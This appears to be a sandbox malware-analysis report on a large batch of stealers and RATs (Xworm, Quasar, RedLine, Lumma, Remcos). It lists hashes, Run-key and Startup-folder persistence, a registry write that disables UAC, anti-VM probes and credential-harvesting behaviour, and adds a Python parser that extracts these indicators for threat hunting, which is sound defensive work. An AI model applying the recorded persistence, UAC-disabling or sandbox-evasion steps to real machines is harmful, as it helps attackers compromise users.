| SHA256 | c239c0c41f3a5919581dc83c9bbce497fa0979ed88ab8c1543393da2a3e5ee41 |
| SHA512 | 14a0dfc952473cbed5e9f856664e3a01e9847d9c90078e29fa001ceeb8a1d641c3f69291955e78962e8fdf525be270814509d83e07df87dc8894130594ab4651 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\DebugDisable.xlsx
| MD5 | 0d2a1fc5449e8722a23d559eb3ab35fc |
| SHA1 | b6b784ff9157a34892d2415861d53f34e797f8ed |
| SHA256 | 22b67a562208e10e3b61e1799f50c2a620e3c7ea8f5bcb4022b1bb926b2a60fe |
| SHA512 | 2c818df5ac648778fcc3022c310daed07d2cc93c26bf4c53b076bf5826773d9d5f421c55c1b9d92a1915fb8e9061d4a31eb702859c520880e25c32fafc640bca |
C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe
| MD5 | ff7e78da9c8e580229fe95dfdfe5b098 |
| SHA1 | ab968e47e463f29426116753b0ca086fd5b33cdb |
| SHA256 | cefa40083339d42320bc1f9ba33c578b8abe47e15eb0dd6b0ba2f734aa8f3d6d |
| SHA512 | 45517b8bc96613daeabb738a42188b8ef19b0ac2b53e3202f7d86f683dacdbe1c4a78414938ab5ad0b48b7c546bc89a78932e3b8a1dbf6604e59b4887de48409 |
C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe
| MD5 | d6b16370cd4e60185aa88607316a0c05 |
| SHA1 | 7fbc63b1203617c67e5491745beaedb424baed78 |
| SHA256 | a6d6d1c8299f97f966d72373e999b5a8e6768914e27d5533307cf6878b95dce2 |
| SHA512 | 16c468948e568343ab1a1460d82b4c5859d09043e3a0115aa9c0aefeabfa22c796cca505ede8b1f194764dda7c5263979230e3fa272ee1fb3b21919202b01906 |
C:\Users\Admin\AppData\Local\Temp\a\02.08.2022.exe
| MD5 | 12d7ae10b1836cd3091d712723a5a4d6 |
| SHA1 | b99fef462f433da1b959c69dfe62703d12464ea7 |
| SHA256 | 8c56614bca1aaaabe522c46bb14ad9237a9d80783725b729feb4b255c8aca445 |
| SHA512 | ab3dd7772ff74a3b48033be5011edc065425e225c5c1c489cd28c6791bd24fc14be01105b97e14dee6ed4b5f453a986048d1a91808619dad518c43065ebc699a |
C:\ProgramData\AnyDesk\system.conf
| MD5 | e437ee3038b3131ac7530b7297d6c680 |
| SHA1 | 40313dee0933ece473782392e1e6b135a98ffaae |
| SHA256 | a0bb637575c3101133977bad99d853e8c23b7f63f7ad05b4a03e2ac26a220a68 |
| SHA512 | 8b0db6a42d77d01a1a1c8f584feb59cbc1c776c4cca87cedbc94887892ae569155199c3db344fdb2075e7bf4302fcfdaf9511efca6aa77204607bc1aecf5dd18 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | a56ea93ad882910cf87db920b65c691c |
| SHA1 | 0b7140fb8ad96c300949dc0c9adc5d6270a2d586 |
| SHA256 | 9a0c1d4188aa276a71668cdced886a6d8ccf36c6dab65540c2be03513ee91998 |
| SHA512 | f1a751cb409ca8f65685eb5edeaa329eb4d42e175625307265d5f43eea04c68a072f0a0228abaff08fb4f471cbfa730b3310dc71124f74c6adb9111d9c2f6758 |
C:\ProgramData\AnyDesk\service.conf
| MD5 | 8a3ee5e9ae7cefdb20d13a8a5bea198a |
| SHA1 | 2a3fe3f4253f73118faeba5940487df2434e3a96 |
| SHA256 | a0749b90ce94a1fa159d034860dc3793f6b08d93bbd1dd94933fc8129a4c602a |
| SHA512 | 2c7e84d64ba0237a2e7afaa93834da585fde62c290b9518dc6b957c46b838ee8f73a398318cec9ea7551dea78857898816e94ef31a09e8cb1da4403b92e5cca9 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
201s
Max time network
300s
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RMS
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1972 created 5772 | N/A | C:\Windows\system32\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe |
| PID 4792 created 1920 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe |
| PID 5224 created 4388 | N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe |
| PID 1888 created 2976 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1416_133785012746871713\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftProfile = "C:\\Users\\Admin\\MicrosoftProfile.exe" | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantApp_Installer.exe | N/A |
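The signature tables above carry three things a responder will want to pull out of this report and hunt for on other hosts: the autostart entries (the HKCU and HKLM Run/RunOnce values, the less commonly monitored Policies\Explorer\Run value used for remcos.exe, and the Startup-folder drops by boleto.exe and l4.exe), the EnableLUA = "0" write by reg.exe, which switches off UAC prompting from the next logon, and the environment probes (the VirtualBox ACPI VBOX__ key, the BIOS version strings, the Software\Wine key) that 3EUEYgl.exe, 9feskIx.exe and 4XYFk9r.exe perform before doing anything else. The script below is an added example, not part of this report or of any tool it names: it parses the report's own four-column signature tables (the embedded sample is a constructed, verbatim subset of the rows above) and turns them into per-process findings. The technique tags, the two-probe threshold and the function names are our own choices.

```python
"""Parse the signature tables of a Triage-style sandbox report into per-process
findings: autostart entries, UAC tampering and sandbox checks. Added example."""
import re
from collections import defaultdict

# Constructed sample: rows copied verbatim from the tables above (a subset).
SAMPLE_REPORT = r"""
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\boleto.lnk | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
"""

HEADER = "| Description | Indicator | Process | Target |"
RUN_KEY = re.compile(r"\\CurrentVersion\\(Policies\\Explorer\\Run|RunOnce|Run)\\[^\\]+$", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
ENABLE_LUA = re.compile(r'\\Policies\\System\\EnableLUA = "0"$', re.I)
# Report signature names mapped to short technique tags (the tags are ours).
ANTI_ANALYSIS = {
    "Identifies VirtualBox via ACPI registry values (likely anti-VM)": "vbox-acpi",
    "Checks BIOS information in registry": "bios-strings",
    "Identifies Wine through registry keys": "wine-key",
    "Suspicious use of NtSetInformationThreadHideFromDebugger": "hide-thread",
}

def parse_signatures(text):
    """One dict per table row, tagged with the signature heading it sits under."""
    rows, signature = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line == HEADER:
            continue
        if not line.startswith("|"):
            signature = line  # a bare line names the table that follows
            continue
        fields = [f.strip() for f in line.strip("|").split(" | ")]
        if len(fields) == 4:
            rows.append(dict(zip(("description", "indicator", "process", "target"), fields),
                             signature=signature))
    return rows

def reg_value(indicator):
    """Split a 'path = "data"' indicator into (key, value name, unescaped data)."""
    path, _, raw = indicator.partition(" = ")
    key, _, name = path.rpartition("\\")
    data = raw.strip()
    if len(data) >= 2 and data[0] == data[-1] == '"':
        data = data[1:-1]
    return key, name, re.sub(r"\\(.)", r"\1", data)  # undo the report's \" and \\ escapes

def image_of(command):
    """Executable part of a command line: the quoted path or the first token."""
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    return command.split(" ", 1)[0]

def persistence(rows):
    """Autostart entries the sample wrote: (mechanism, name, image, writing process)."""
    found = []
    for r in rows:
        ind = r["indicator"]
        if r["description"].startswith("Set value") and " = " in ind:
            key, name, data = reg_value(ind)
            m = RUN_KEY.search(key + "\\" + name)
            if m:
                found.append((m.group(1), name, image_of(data), r["process"]))
        elif r["description"] == "File created" and STARTUP_DIR.search(ind):
            found.append(("Startup folder", ind.rsplit("\\", 1)[1], ind, r["process"]))
    return found

def uac_disabled_by(rows):
    """Processes that set Policies\\System\\EnableLUA to 0 (UAC prompting stops at next logon)."""
    return sorted({r["process"] for r in rows if ENABLE_LUA.search(r["indicator"])})

def anti_analysis(rows, min_techniques=2):
    """Processes probing the environment with at least min_techniques distinct checks."""
    seen = defaultdict(set)
    for r in rows:
        if r["signature"] in ANTI_ANALYSIS:
            seen[r["process"]].add(ANTI_ANALYSIS[r["signature"]])
    return {p: sorted(t) for p, t in seen.items() if len(t) >= min_techniques}
```

Calling persistence(parse_signatures(SAMPLE_REPORT)) yields the Policies\Explorer\Run entry for remcos.exe, the boleto.lnk Startup-folder drop, the wextract RunOnce cleanup value (a normal installer artifact, shown so it can be told apart from the others by its image, rundll32.exe) and the HKCU Run value for boleto.exe. The parser keys only on the bare heading lines and the four-column layout, so it runs unchanged on the other behavioral analyses of this submission; anti_analysis requires two distinct probe signatures from one process before reporting it, so a process that touches just one of those keys stays out of the output.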
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SigniantInstallhelper.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
